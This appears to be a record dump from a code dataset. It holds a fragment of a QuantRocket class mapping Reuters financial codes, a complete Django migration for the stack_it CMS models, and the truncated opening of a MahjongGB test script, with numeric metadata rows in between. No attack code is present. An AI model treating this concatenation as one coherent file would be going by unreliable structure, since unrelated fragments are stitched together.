EPAC = Column(float64_dtype) # Amortization of Policy Acquisition Costs
LLTD = Column(float64_dtype) # Long Term Debt
ATOT = Column(float64_dtype) # Total Assets
CIAC = Column(float64_dtype) # Income Available to Com Excl ExtraOrd
QEDG = Column(float64_dtype) # ESOP Debt Guarantee
LMIN = Column(float64_dtype) # Minority Interest
ADEP = Column(float64_dtype) # Accumulated Depreciation, Total
class ReutersInterimFinancials(DataSet):
"""
Dataset representing all available Reuters financials Chart of Account
(COA) codes. Utilizes interim fiscal periods.
Available financials:
Accounts Payable: LAPB
Accounts Receivable - Trade, Net: AACR
Accrued Expenses: LAEX
Accumulated Depreciation, Total: ADEP
Additional Paid-In Capital: QPIC
Allowance for Funds Used During Const.: NAFC
Amortization: SAMT
Amortization of Policy Acquisition Costs: EPAC
Capital Expenditures: SCEX
Capital Lease Obligations: LCLO
Cash: ACSH
Cash & Due from Banks: ACDB
Cash & Equivalents: ACAE
Cash Interest Paid: SCIP
Cash Payments: OCPD
Cash Receipts: OCRC
Cash Taxes Paid: SCTP
Cash and Short Term Investments: SCSI
Cash from Financing Activities: FTLF
Cash from Investing Activities: ITLI
Cash from Operating Activities: OTLO
Changes in Working Capital: SOCF
Common Stock, Total: SCMS
Cost of Revenue, Total: SCOR
Current Port. of LT Debt/Capital Leases: LCLD
DPS - Common Stock Primary Issue: DDPS1
Deferred Income Tax: SBDT
Deferred Policy Acquisition Costs: ADPA
Deferred Taxes: OBDT
Depreciation/Amortization: SDPR
Depreciation/Depletion: SDED
Diluted EPS Excluding ExtraOrd Items: SDBF
Diluted Net Income: SDNI
Diluted Normalized EPS: VDES
Diluted Weighted Average Shares: SDWS
Dilution Adjustment: SDAJ
ESOP Debt Guarantee: QEDG
Equity In Affiliates: CEIA
Financing Cash Flow Items: SFCF
Foreign Exchange Effects: SFEE
Fuel Expense: EFEX
Gain (Loss) on Sale of Assets: NGLA
Goodwill, Net: AGWI
Gross Profit: SGRP
Income Available to Com Excl ExtraOrd: CIAC
Income Available to Com Incl ExtraOrd: XNIC
Insurance Receivables: APRE
Intangibles, Net: AINT
Interest Exp.(Inc.),Net-Operating, Total: SINN
Interest Inc.(Exp.),Net-Non-Op., Total: SNIN
Interest Income, Bank: SIIB
Issuance (Retirement) of Debt, Net: FPRD
Issuance (Retirement) of Stock, Net: FPSS
Loan Loss Provision: ELLP
Long Term Debt: LLTD
Long Term Investments: SINV
Losses, Benefits, and Adjustments, Total: SLBA
Minority Interest: LMIN
Minority Interest: CMIN
Net Change in Cash: SNCC
Net Income: NINC
Net Income After Taxes: TIAT
Net Income Before Extra. Items: NIBX
Net Income Before Taxes: EIBT
Net Income/Starting Line: ONET
Net Interest Inc. After Loan Loss Prov.: SIAP
Net Interest Income: ENII
Net Investment Income: RNII
Net Loans: ANTL
Non-Cash Items: SNCI
Non-Interest Expense, Bank: SNIE
Non-Interest Income, Bank: SNII
Note Receivable - Long Term: ALTR
Notes Payable/Short Term Debt: LSTD
Operating Income: SOPI
Operations & Maintenance: EDOE
Other Assets, Total: SOAT
Other Bearing Liabilities, Total: SOBL
Other Current Assets, Total: SOCA
Other Current liabilities, Total: SOCL
Other Earning Assets, Total: SOEA
Other Equity, Total: SOTE
Other Investing Cash Flow Items, Total: SICF
Other Liabilities, Total: SLTL
Other Long Term Assets, Total: SOLA
Other Operating Expenses, Total: SOOE
Other Revenue, Total: SORE
Other, Net: SONT
Payable/Accrued: LPBA
Policy Liabilities: SPOL
Preferred Stock - Non Redeemable, Net: SPRS
Prepaid Expenses: APPY
Property/Plant/Equipment, Total - Gross: APTC
Property/Plant/Equipment, Total - Net: APPN
Provision for Income Taxes: TTAX
Realized & Unrealized Gains (Losses): RRGL
Redeemable Preferred Stock, Total: SRPR
Research & Development: ERAD
Retained Earnings (Accumulated Deficit): QRED
Revenue: SREV
Selling/General/Admin. Expenses, Total: SSGA
Short Term Investments: ASTI
Tangible Book Value per Share, Common Eq: STBP
Total Adjustments to Net Income: SANI
Total Assets: ATOT
Total Cash Dividends Paid: FCDP
Total Common Shares Outstanding: QTCO
Total Current Assets: ATCA
Total Current Liabilities: LTCL
Total Debt: STLD
Total Deposits: LDBT
Total Equity: QTLE
Total Extraordinary Items: STXI
Total Interest Expense: STIE
Total Inventory: AITL
Total Liabilities: LTLL
Total Liabilities & Shareholders' Equity: QTEL
Total Long Term Debt: LTTD
Total Operating Expense: ETOE
Total Preferred Shares Outstanding: QTPO
Total Premiums Earned: SPRE
Total Receivables, Net: ATRC
Total Revenue: RTLR
Total Short Term Borrowings: LSTB
Total Utility Plant, Net: SUPN
Treasury Stock - Common: QTSC
U.S. GAAP Adjustment: CGAP
Unrealized Gain (Loss): QUGL
Unusual Expense (Income): SUIE
To regenerate the column list and docstring:
>>> from quantrocket.fundamental import list_reuters_codes
>>> codes = list_reuters_codes(report_types=["financials"])
>>> attrs= "\n".join(["{0} = Column(float64_dtype) # {1}".format(k,v) for k,v in codes["financials"].items()])
>>> print(attrs)
>>> docstring = "\n".join(["{0}: {1}".format(v,k) for k,v in sorted(codes["financials"].items(), key=lambda x: x[1])])
>>> print(docstring)
"""
SCMS = Column(float64_dtype) # Common Stock, Total
VDES = Column(float64_dtype) # Diluted Normalized EPS
SDNI = Column(float64_dtype) # Diluted Net Income
SPRS = Column(float64_dtype) # Preferred Stock - Non Redeemable, Net
SOPI = Column(float64_dtype) # Operating Income
LAPB = Column(float64_dtype) # Accounts Payable
NINC = Column(float64_dtype) # Net Income
SOCL = Column(float64_dtype) # Other Current liabilities, Total
ETOE = Column(float64_dtype) # Total Operating Expense
SOLA = Column(float64_dtype) # Other Long Term Assets, Total
SREV = Column(float64_dtype) # Revenue
LAEX = Column(float64_dtype) # Accrued Expenses
XNIC = Column(float64_dtype) # Income Available to Com Incl ExtraOrd
SUIE = Column(float64_dtype) # Unusual Expense (Income)
APTC = Column(float64_dtype) # Property/Plant/Equipment, Total - Gross
SOBL = Column(float64_dtype) # Other Bearing Liabilities, Total
SNII = Column(float64_dtype) # Non-Interest Income, Bank
CEIA = Column(float64_dtype) # Equity In Affiliates
ERAD = Column(float64_dtype) # Research & Development
SDBF = Column(float64_dtype) # Diluted EPS Excluding ExtraOrd Items
SDWS = Column(float64_dtype) # Diluted Weighted Average Shares
SORE = Column(float64_dtype) # Other Revenue, Total
SCEX = Column(float64_dtype) # Capital Expenditures
ELLP = Column(float64_dtype) # Loan Loss Provision
ACSH = Column(float64_dtype) # Cash
AACR = Column(float64_dtype) # Accounts Receivable - Trade, Net
SCOR = Column(float64_dtype) # Cost of Revenue, Total
SUPN = Column(float64_dtype) # Total Utility Plant, Net
EIBT = Column(float64_dtype) # Net Income Before Taxes
AGWI = Column(float64_dtype) # Goodwill, Net
SCIP = Column(float64_dtype) # Cash Interest Paid
SDED = Column(float64_dtype) # Depreciation/Depletion
RNII = Column(float64_dtype) # Net Investment Income
ADPA = Column(float64_dtype) # Deferred Policy Acquisition Costs
SONT = Column(float64_dtype) # Other, Net
CGAP = Column(float64_dtype) # U.S. GAAP Adjustment
AINT = Column(float64_dtype) # Intangibles, Net
SGRP = Column(float64_dtype) # Gross Profit
SNIE = Column(float64_dtype) # Non-Interest Expense, Bank
EDOE = Column(float64_dtype) # Operations & Maintenance
SSGA = Column(float64_dtype) # Selling/General/Admin. Expenses, Total
SNIN = Column(float64_dtype) # Interest Inc.(Exp.),Net-Non-Op., Total
QTSC = Column(float64_dtype) # Treasury Stock - Common
OCPD = Column(float64_dtype) # Cash Payments
OBDT = Column(float64_dtype) # Deferred Taxes
TTAX = Column(float64_dtype) # Provision for Income Taxes
LPBA = Column(float64_dtype) # Payable/Accrued
QRED = Column(float64_dtype) # Retained Earnings (Accumulated Deficit)
SCSI = Column(float64_dtype) # Cash and Short Term Investments
SIAP = Column(float64_dtype) # Net Interest Inc. After Loan Loss Prov.
ANTL = Column(float64_dtype) # Net Loans
QTCO = Column(float64_dtype) # Total Common Shares Outstanding
LDBT = Column(float64_dtype) # Total Deposits
SANI = Column(float64_dtype) # Total Adjustments to Net Income
AITL = Column(float64_dtype) # Total Inventory
ATRC = Column(float64_dtype) # Total Receivables, Net
SBDT = Column(float64_dtype) # Deferred Income Tax
ASTI = Column(float64_dtype) # Short Term Investments
OTLO = Column(float64_dtype) # Cash from Operating Activities
OCRC = Column(float64_dtype) # Cash Receipts
RRGL = Column(float64_dtype) # Realized & Unrealized Gains (Losses)
STLD = Column(float64_dtype) # Total Debt
LTTD = Column(float64_dtype) # Total Long Term Debt
LTLL = Column(float64_dtype) # Total Liabilities
APPN = Column(float64_dtype) # Property/Plant/Equipment, Total - Net
SCTP = Column(float64_dtype) # Cash Taxes Paid
SLTL = Column(float64_dtype) # Other Liabilities, Total
DDPS1 = Column(float64_dtype) # DPS - Common Stock Primary Issue
SRPR = Column(float64_dtype) # Redeemable Preferred Stock, Total
ITLI = Column(float64_dtype) # Cash from Investing Activities
ONET = Column(float64_dtype) # Net Income/Starting Line
SDPR = Column(float64_dtype) # Depreciation/Amortization
STIE = Column(float64_dtype) # Total Interest Expense
APRE = Column(float64_dtype) # Insurance Receivables
SNCC = Column(float64_dtype) # Net Change in Cash
SFCF = Column(float64_dtype) # Financing Cash Flow Items
SINN = Column(float64_dtype) # Interest Exp.(Inc.),Net-Operating, Total
CMIN = Column(float64_dtype) # Minority Interest
SOAT = Column(float64_dtype) # Other Assets, Total
SNCI = Column(float64_dtype) # Non-Cash Items
LCLD = Column(float64_dtype) # Current Port. of LT Debt/Capital Leases
SDAJ = Column(float64_dtype) # Dilution Adjustment
SIIB = Column(float64_dtype) # Interest Income, Bank
QUGL = Column(float64_dtype) # Unrealized Gain (Loss)
NIBX = Column(float64_dtype) # Net Income Before Extra. Items
SOOE = Column(float64_dtype) # Other Operating Expenses, Total
SAMT = Column(float64_dtype) # Amortization
SFEE = Column(float64_dtype) # Foreign Exchange Effects
STXI = Column(float64_dtype) # Total Extraordinary Items
APPY = Column(float64_dtype) # Prepaid Expenses
EFEX = Column(float64_dtype) # Fuel Expense
QTPO = Column(float64_dtype) # Total Preferred Shares Outstanding
NGLA = Column(float64_dtype) # Gain (Loss) on Sale of Assets
SINV = Column(float64_dtype) # Long Term Investments
SOCA = Column(float64_dtype) # Other Current Assets, Total
FCDP = Column(float64_dtype) # Total Cash Dividends Paid
FPSS = Column(float64_dtype) # Issuance (Retirement) of Stock, Net
RTLR = Column(float64_dtype) # Total Revenue
ACDB = Column(float64_dtype) # Cash & Due from Banks
TIAT = Column(float64_dtype) # Net Income After Taxes
SOEA = Column(float64_dtype) # Other Earning Assets, Total
SOTE = Column(float64_dtype) # Other Equity, Total
SPOL = Column(float64_dtype) # Policy Liabilities
NAFC = Column(float64_dtype) # Allowance for Funds Used During Const.
QPIC = Column(float64_dtype) # Additional Paid-In Capital
QTLE = Column(float64_dtype) # Total Equity
ACAE = Column(float64_dtype) # Cash & Equivalents
FPRD = Column(float64_dtype) # Issuance (Retirement) of Debt, Net
ALTR = Column(float64_dtype) # Note Receivable - Long Term
SLBA = Column(float64_dtype) # Losses, Benefits, and Adjustments, Total
ATCA = Column(float64_dtype) # Total Current Assets
SOCF = Column(float64_dtype) # Changes in Working Capital
LCLO = Column(float64_dtype) # Capital Lease Obligations
LSTD = Column(float64_dtype) # Notes Payable/Short Term Debt
STBP = Column(float64_dtype) # Tangible Book Value per Share, Common Eq
SICF = Column(float64_dtype) # Other Investing Cash Flow Items, Total
ENII = Column(float64_dtype) # Net Interest Income
QTEL = Column(float64_dtype) # Total Liabilities & Shareholders' Equity
FTLF = Column(float64_dtype) # Cash from Financing Activities
LTCL = Column(float64_dtype) # Total Current Liabilities
SPRE = Column(float64_dtype) # Total Premiums Earned
LSTB = Column(float64_dtype) # Total Short Term Borrowings
EPAC = Column(float64_dtype) # Amortization of Policy Acquisition Costs
LLTD = Column(float64_dtype) # Long Term Debt
ATOT = Column(float64_dtype) # Total Assets
CIAC = Column(float64_dtype) # Income Available to Com Excl ExtraOrd
QEDG = Column(float64_dtype) # ESOP Debt Guarantee
LMIN = Column(float64_dtype) # Minority Interest
ADEP = Column(float64_dtype) # Accumulated Depreciation, Total
| 46.532399 | 122 | 0.720888 | 3,354 | 26,570 | 5.629696 | 0.119559 | 0.165872 | 0.247855 | 0.053596 | 0.967694 | 0.967694 | 0.967694 | 0.967694 | 0.967694 | 0.967694 | 0 | 0.025759 | 0.205156 | 26,570 | 570 | 123 | 46.614035 | 0.868318 | 0.65111 | 0 | 0.984733 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.007634 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 9 |
1738d495ef8f65c7515c69d843c3df87f0d62b99 | 21,768 | py | Python | stack_it/migrations/0001_initial.py | Jufik/django_stack_it | d95e960ad7ee7f62d5370fb36d0a8dc863a0edd6 | [
"MIT"
] | 8 | 2019-04-15T13:14:19.000Z | 2022-03-09T17:35:11.000Z | stack_it/migrations/0001_initial.py | Jufik/django_stack_it | d95e960ad7ee7f62d5370fb36d0a8dc863a0edd6 | [
"MIT"
] | 3 | 2019-03-19T13:53:52.000Z | 2020-02-11T23:54:45.000Z | stack_it/migrations/0001_initial.py | Jufik/django_stack_it | d95e960ad7ee7f62d5370fb36d0a8dc863a0edd6 | [
"MIT"
] | 3 | 2019-06-05T12:52:26.000Z | 2019-07-24T08:14:49.000Z | # Generated by Django 2.1.5 on 2019-09-03 07:00
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import model_utils.fields
import mptt.fields
import polymorphic_tree.models
import stack_it.utils.validators
class Migration(migrations.Migration):
initial = True
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
('sites', '0002_alter_domain_unique'),
]
operations = [
migrations.CreateModel(
name='Image',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('folder', models.CharField(choices=[('folder', 'folder')], default='folder', max_length=50, verbose_name='Folder')),
('image', models.ImageField(upload_to='', verbose_name='Image')),
('alt', models.CharField(blank=True, max_length=50, verbose_name='Alternative text')),
],
options={
'verbose_name': 'Image',
'verbose_name_plural': 'Images',
},
),
migrations.CreateModel(
name='Menu',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('name', models.CharField(max_length=150, verbose_name='Name')),
('lft', models.PositiveIntegerField(db_index=True, editable=False)),
('rght', models.PositiveIntegerField(db_index=True, editable=False)),
('tree_id', models.PositiveIntegerField(db_index=True, editable=False)),
('level', models.PositiveIntegerField(db_index=True, editable=False)),
],
options={
'verbose_name': 'Menu',
'verbose_name_plural': 'Menus',
},
),
migrations.CreateModel(
name='Page',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('meta_description', models.CharField(default='', help_text='keep this under 160 characters for best optimisation', max_length=250, verbose_name='Meta Description')),
('meta_description_en', models.CharField(default='', help_text='keep this under 160 characters for best optimisation', max_length=250, null=True, verbose_name='Meta Description')),
('meta_description_fr', models.CharField(default='', help_text='keep this under 160 characters for best optimisation', max_length=250, null=True, verbose_name='Meta Description')),
('meta_title', models.TextField(default='', help_text='keep this under 60 characters for best optimisation', verbose_name='Meta Title')),
('meta_title_en', models.TextField(default='', help_text='keep this under 60 characters for best optimisation', null=True, verbose_name='Meta Title')),
('meta_title_fr', models.TextField(default='', help_text='keep this under 60 characters for best optimisation', null=True, verbose_name='Meta Title')),
('tw_title', models.CharField(blank=True, help_text='Keep this under 70 characters for best optimisation', max_length=100, verbose_name='Twitter Title')),
('tw_title_en', models.CharField(blank=True, help_text='Keep this under 70 characters for best optimisation', max_length=100, null=True, verbose_name='Twitter Title')),
('tw_title_fr', models.CharField(blank=True, help_text='Keep this under 70 characters for best optimisation', max_length=100, null=True, verbose_name='Twitter Title')),
('tw_description', models.TextField(blank=True, help_text='Twitter description less than 200 characters', verbose_name='Twitter Description')),
('tw_description_en', models.TextField(blank=True, help_text='Twitter description less than 200 characters', null=True, verbose_name='Twitter Description')),
('tw_description_fr', models.TextField(blank=True, help_text='Twitter description less than 200 characters', null=True, verbose_name='Twitter Description')),
('og_title', models.CharField(blank=True, help_text='Keep it under 55 characters for best optimisation', max_length=100, verbose_name='Facebook Title')),
('og_title_en', models.CharField(blank=True, help_text='Keep it under 55 characters for best optimisation', max_length=100, null=True, verbose_name='Facebook Title')),
('og_title_fr', models.CharField(blank=True, help_text='Keep it under 55 characters for best optimisation', max_length=100, null=True, verbose_name='Facebook Title')),
('og_description', models.TextField(blank=True, help_text='Facebook description less than 300 characters', verbose_name='Facebook Description')),
('og_description_en', models.TextField(blank=True, help_text='Facebook description less than 300 characters', null=True, verbose_name='Facebook Description')),
('og_description_fr', models.TextField(blank=True, help_text='Facebook description less than 300 characters', null=True, verbose_name='Facebook Description')),
('priority', models.FloatField(default=0.5, verbose_name='Page priority for indexation')),
('changefreq', models.CharField(choices=[('always', 'always'), ('hourly', 'hourly'), ('daily', 'daily'), ('weekly', 'weekly'), ('monthly', 'monthly'), ('yearly', 'yearly'), ('never', 'never')], default='monthly', max_length=50, verbose_name='Page change frequency')),
('slug', models.SlugField(blank=True, max_length=500, verbose_name='Slug')),
('slug_en', models.SlugField(blank=True, max_length=500, null=True, verbose_name='Slug')),
('slug_fr', models.SlugField(blank=True, max_length=500, null=True, verbose_name='Slug')),
('auto_slug', models.BooleanField(default=True, help_text="When set, your slug will automatically be updated from field define in class's SLUGIFY_FROM", verbose_name='Auto Slug')),
('auto_slug_en', models.BooleanField(default=True, help_text="When set, your slug will automatically be updated from field define in class's SLUGIFY_FROM", verbose_name='Auto Slug')),
('auto_slug_fr', models.BooleanField(default=True, help_text="When set, your slug will automatically be updated from field define in class's SLUGIFY_FROM", verbose_name='Auto Slug')),
('ref_full_path', models.SlugField(editable=False, max_length=500, verbose_name='Denormalized full path')),
('ref_full_path_en', models.SlugField(editable=False, max_length=500, null=True, verbose_name='Denormalized full path')),
('ref_full_path_fr', models.SlugField(editable=False, max_length=500, null=True, verbose_name='Denormalized full path')),
('template_path', models.CharField(default='', max_length=250, verbose_name='Template Path')),
('title', models.CharField(max_length=250, verbose_name='Title')),
('title_en', models.CharField(max_length=250, null=True, verbose_name='Title')),
('title_fr', models.CharField(max_length=250, null=True, verbose_name='Title')),
('status', model_utils.fields.StatusField(choices=[('draft', 'Draft'), ('published', 'Published')], default='draft', max_length=100, no_check_for_status=True)),
('verbose_name', models.CharField(max_length=250, verbose_name='Instance model verbose_name')),
('key', models.SlugField(blank=True, max_length=250, null=True, verbose_name='Key for development')),
('date_updated', models.DateTimeField(auto_now=True, verbose_name='Last update date')),
('lft', models.PositiveIntegerField(db_index=True, editable=False)),
('rght', models.PositiveIntegerField(db_index=True, editable=False)),
('tree_id', models.PositiveIntegerField(db_index=True, editable=False)),
('level', models.PositiveIntegerField(db_index=True, editable=False)),
('main_site', models.ForeignKey(blank=True, help_text='In case the page is available on multiple websites, choose which one is to be considered as the main one', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='pages_as_main_site', to='sites.Site', verbose_name='Main Site')),
('meta_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='meta_images', to='stack_it.Image', verbose_name='Meta Image')),
('og_image', models.ForeignKey(blank=True, help_text='must be at least 1200x630px', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='od_images', to='stack_it.Image', verbose_name='Facebook Image')),
('parent', polymorphic_tree.models.PolymorphicTreeForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', to='stack_it.Page')),
('polymorphic_ctype', models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='polymorphic_stack_it.page_set+', to='contenttypes.ContentType')),
('sites', models.ManyToManyField(help_text='This page will be available for each of those websites', to='sites.Site', verbose_name='Site')),
('tw_image', models.ForeignKey(blank=True, help_text='must be at least 120x120px', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='tw_images', to='stack_it.Image', verbose_name='Twitter Image')),
],
options={
'verbose_name': 'Page',
'verbose_name_plural': 'Pages',
},
),
migrations.CreateModel(
name='PageContent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('key', models.CharField(max_length=50, verbose_name='Key')),
('content_type', models.CharField(choices=[('meta', 'Meta content'), ('value', 'Standard content')], default='value', max_length=50, verbose_name='Content Type')),
],
options={
'verbose_name': 'Page Content',
'verbose_name_plural': 'Page Contents',
},
),
migrations.CreateModel(
name='Template',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=250, null=True, verbose_name='Name')),
('path', models.CharField(max_length=250, verbose_name='Path')),
],
options={
'verbose_name': 'Template',
'verbose_name_plural': 'Templates',
},
),
migrations.CreateModel(
name='TemplateContent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('key', models.CharField(max_length=50, verbose_name='Key')),
('content_type', models.CharField(choices=[('meta', 'Meta content'), ('value', 'Standard content')], default='value', max_length=50, verbose_name='Content Type')),
],
options={
'verbose_name': 'Template',
'verbose_name_plural': 'Template',
},
),
migrations.CreateModel(
name='ImagePageContent',
fields=[
('pagecontent_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='stack_it.PageContent')),
('ref_image', models.ImageField(upload_to='', verbose_name='Image')),
('ref_alt', models.CharField(blank=True, max_length=50, null=True, verbose_name='Alternative text')),
('size', models.CharField(default='800x600', max_length=50, validators=[stack_it.utils.validators.validate_image_size], verbose_name='Size')),
('image', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stack_it.Image', verbose_name='Image instance')),
],
options={
'verbose_name': 'Image Page Content',
'verbose_name_plural': 'Image Page Contents',
},
bases=('stack_it.pagecontent', models.Model),
),
migrations.CreateModel(
name='ImageTemplateContent',
fields=[
('templatecontent_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='stack_it.TemplateContent')),
('ref_image', models.ImageField(upload_to='', verbose_name='Image')),
('ref_alt', models.CharField(blank=True, max_length=50, null=True, verbose_name='Alternative text')),
('size', models.CharField(default='800x600', max_length=50, validators=[stack_it.utils.validators.validate_image_size], verbose_name='Size')),
('image', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stack_it.Image', verbose_name='Image instance')),
],
options={
'verbose_name': 'Image Template Content',
'verbose_name_plural': 'Image Template Contents',
},
bases=('stack_it.templatecontent', models.Model),
),
migrations.CreateModel(
name='ModelPageContent',
fields=[
('pagecontent_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='stack_it.PageContent')),
('instance_id', models.IntegerField(null=True, verbose_name='Object id')),
('model_name', models.CharField(max_length=50, validators=[stack_it.utils.validators.validate_model_name], verbose_name='Model Name')),
],
options={
'verbose_name': 'Related Model Page Content',
'verbose_name_plural': 'Related Model Page Contents',
},
bases=('stack_it.pagecontent', models.Model),
),
migrations.CreateModel(
name='ModelTemplateContent',
fields=[
('templatecontent_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='stack_it.TemplateContent')),
('instance_id', models.IntegerField(null=True, verbose_name='Object id')),
('model_name', models.CharField(max_length=50, validators=[stack_it.utils.validators.validate_model_name], verbose_name='Model Name')),
],
options={
'verbose_name': 'Related Model Template Content',
'verbose_name_plural': 'Related Model Template Contents',
},
bases=('stack_it.templatecontent', models.Model),
),
migrations.CreateModel(
name='PagePageContent',
fields=[
('pagecontent_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='stack_it.PageContent')),
('value', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_pagepagecontent', to='stack_it.Page', verbose_name='Page')),
],
options={
'verbose_name': 'Related Page Page Content',
'verbose_name_plural': 'Related Page Page Contents',
},
bases=('stack_it.pagecontent', models.Model),
),
migrations.CreateModel(
name='PageTemplateContent',
fields=[
('templatecontent_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='stack_it.TemplateContent')),
('value', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_pagetemplatecontent', to='stack_it.Page', verbose_name='Page')),
],
options={
'verbose_name': 'Related Page Template Content',
'verbose_name_plural': 'Related Page Template Contents',
},
bases=('stack_it.templatecontent', models.Model),
),
migrations.CreateModel(
name='TextPageContent',
fields=[
('pagecontent_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='stack_it.PageContent')),
('value', models.TextField(verbose_name='Value')),
('value_en', models.TextField(null=True, verbose_name='Value')),
('value_fr', models.TextField(null=True, verbose_name='Value')),
],
options={
'verbose_name': 'Text Page Content',
'verbose_name_plural': 'Text Page Contents',
},
bases=('stack_it.pagecontent', models.Model),
),
migrations.CreateModel(
name='TextTemplateContent',
fields=[
('templatecontent_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='stack_it.TemplateContent')),
('value', models.TextField(verbose_name='Value')),
('value_en', models.TextField(null=True, verbose_name='Value')),
('value_fr', models.TextField(null=True, verbose_name='Value')),
],
options={
'verbose_name': 'Text Template Content',
'verbose_name_plural': 'Text Template Contents',
},
bases=('stack_it.templatecontent', models.Model),
),
migrations.AddField(
model_name='templatecontent',
name='polymorphic_ctype',
field=models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='polymorphic_stack_it.templatecontent_set+', to='contenttypes.ContentType'),
),
migrations.AddField(
model_name='templatecontent',
name='template',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='contents', to='stack_it.Template', verbose_name='Template'),
),
migrations.AddField(
model_name='pagecontent',
name='page',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='contents', to='stack_it.Page', verbose_name='Page'),
),
migrations.AddField(
model_name='pagecontent',
name='polymorphic_ctype',
field=models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='polymorphic_stack_it.pagecontent_set+', to='contenttypes.ContentType'),
),
migrations.AddField(
model_name='menu',
name='page',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='menus', to='stack_it.Page', verbose_name='Page'),
),
migrations.AddField(
model_name='menu',
name='parent',
field=mptt.fields.TreeForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', to='stack_it.Menu'),
),
migrations.AlterUniqueTogether(
name='templatecontent',
unique_together={('template', 'key')},
),
migrations.AlterUniqueTogether(
name='pagecontent',
unique_together={('page', 'key')},
),
]
| 72.318937 | 313 | 0.643284 | 2,370 | 21,768 | 5.715612 | 0.093671 | 0.097446 | 0.03322 | 0.039274 | 0.834933 | 0.809169 | 0.769674 | 0.742138 | 0.719401 | 0.705079 | 0 | 0.011556 | 0.220829 | 21,768 | 300 | 314 | 72.56 | 0.7871 | 0.002067 | 0 | 0.546075 | 1 | 0.003413 | 0.258644 | 0.021868 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.023891 | 0 | 0.037543 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
17a24778774c51e482c17606534fe3e0a0837e29 | 880 | py | Python | fan-calculator-usage/Mahjong-GB-Python/test.py | fichas/mahjong | 6d44cc88c62d4a2084af520c8abb60451c548515 | [
"CC0-1.0"
] | null | null | null | fan-calculator-usage/Mahjong-GB-Python/test.py | fichas/mahjong | 6d44cc88c62d4a2084af520c8abb60451c548515 | [
"CC0-1.0"
] | null | null | null | fan-calculator-usage/Mahjong-GB-Python/test.py | fichas/mahjong | 6d44cc88c62d4a2084af520c8abb60451c548515 | [
"CC0-1.0"
] | null | null | null | from MahjongGB import MahjongFanCalculator
try:
